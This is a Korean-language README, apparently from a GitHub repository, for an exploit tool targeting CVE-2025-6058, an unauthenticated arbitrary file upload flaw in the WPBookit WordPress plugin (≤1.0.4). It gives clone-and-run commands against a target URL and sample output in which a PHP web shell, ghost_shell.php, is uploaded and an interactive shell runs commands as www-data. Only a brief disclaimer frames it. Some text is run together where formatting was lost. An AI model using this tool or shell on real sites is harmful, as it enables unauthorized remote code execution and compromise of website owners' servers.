
WordPress WPBookit ≤ 1.0.4 인증되지 않은 파일 업로드 익스플로잇
인증되지 않은 임의 파일 업로드 익스플로잇 — WordPress WPBookit 플러그인 (≤ 1.0.4) 대상
익스플로잇은 원격 셸 업로드 및 전체 명령 실행을 허용합니다.
저자: 0xgh057r3c0n
CVE-2025-6058은 WordPress CMS의 WPBookit 플러그인에 영향을 미치는 치명적인 취약점입니다. 인증되지 않은 공격자가 취약한 AJAX 엔드포인트를 악용하여 임의의 PHP 파일을 업로드할 수 있으며, 이를 통해 **원격 코드 실행(RCE)**이 가능합니다.
README.txt를 통해 WordPress 플러그인 버전 자동 탐지ghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
이 익스플로잇은 교육 목적 및 승인된 침투 테스트를 위해 개발되었습니다. 명시적 동의 없이 시스템에 무단 사용하는 것은 불법입니다.
MIT License에 따라 배포됩니다.
WordPress 보안 감사를 위해 제작됨 🛡️ by 0xgh057r3c0n